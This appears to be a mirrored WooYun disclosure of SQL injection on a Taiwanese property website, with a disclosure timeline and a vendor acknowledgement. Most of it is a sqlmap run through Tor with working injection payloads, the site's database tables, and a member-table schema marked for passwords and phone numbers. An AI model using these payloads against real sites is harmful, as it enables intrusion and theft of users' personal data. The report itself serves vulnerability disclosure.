乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
台湾優築網SQL注入
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/01_case/01_case_00_overview.php?MainID=1" --dbs --is-dba --current-dbParameter: MainID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: MainID=1' AND 7235=7235 AND 'SUmO'='SUmO Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: MainID=1' AND (SELECT 1443 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(1443=1443,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DEGx'='DEGx Type: UNION query Title: Generic UNION query (N) - 11 columns Payload: MainID=1' UNION ALL SELECT 'N',CONCAT(0x716b7a6271,0x7361694776426169584f,0x7176707a71),'N','N','N','N','N','N','N','N','N'--web application technology: Apacheback-end DBMS: MySQL 5.0current database: 'vhost71706'current user is DBA: FalseDatabase: vhost71706+------------------------+---------+| Table | Entries |+------------------------+---------+| p_impeach_tb | 11628 || c_news | 9750 || c_build_img | 7646 || tb_sys_history | 5711 || c_news_b | 5077 || c_build_cdr | 4804 || c_build_tb | 3773 || hat_area | 3144 || c_build_sp | 1579 || c_member_tb | 1262 | =====> 1千多用户| c_contact | 935 || c_build_img_dir | 904 || c_build_direction_item | 843 || c_store_tb | 781 || p_city_tb | 389 || sys_city_tb | 387 || hat_city | 345 || p_fav_tb | 333 || c_build_question | 300 || unju_creation | 275 || role1 | 251 || c_forum_tb | 241 || m_cms | 239 || c_build_img_date | 237 || c_link | 103 || city_sory_detail | 99 |<....>Database: vhost71706Table: c_member_tb[46 columns]+------------+---------------------+| Column | Type |+------------+---------------------+| mid | bigint(10) unsigned || zaddress1 | text | ==>地址| zboss | varchar(50) || zchild | varchar(20) || zcity1 | varchar(20) || zcompany | text || zdate | datetime || zday | char(2) || zeditdate | datetime || zepaper | varchar(5) || zfirstname | text || zid | varchar(20) || zjob | bigint(5) || zjob2 | bigint(5) || zjobname | varchar(20) || zlink | text || zloginid | text | ==>用户| zlv | bigint(10) | | zmail | varchar(100) || zmarry | varchar(20) || zmoney | varchar(20) || zmonth | char(2) || zmsn | text || zname | text | | zorder | bigint(20) | | zpassa | varchar(50) || zpassq | varchar(20) || zpasswd | text | ==>密码| zpic | varchar(50) || zpicsize | text || zprevid | bigint(10) || zschool | varchar(20) || zsex | varchar(20) || zsex2 | varchar(5) || zskype | text || zstate | varchar(5) || ztel | varchar(10) | ==> 电话| ztel2 | varchar(20) || ztel3 | text || ztel4 | text || ztel5 | text || ztel6 | text || ztitle | varchar(200) || zuserid | text || zyear | varchar(4) || zzone1 | varchar(10) |+------------+---------------------+
过滤
危害等级:高
漏洞Rank:17
确认时间:2015-12-14 22:59
感謝通報
暂无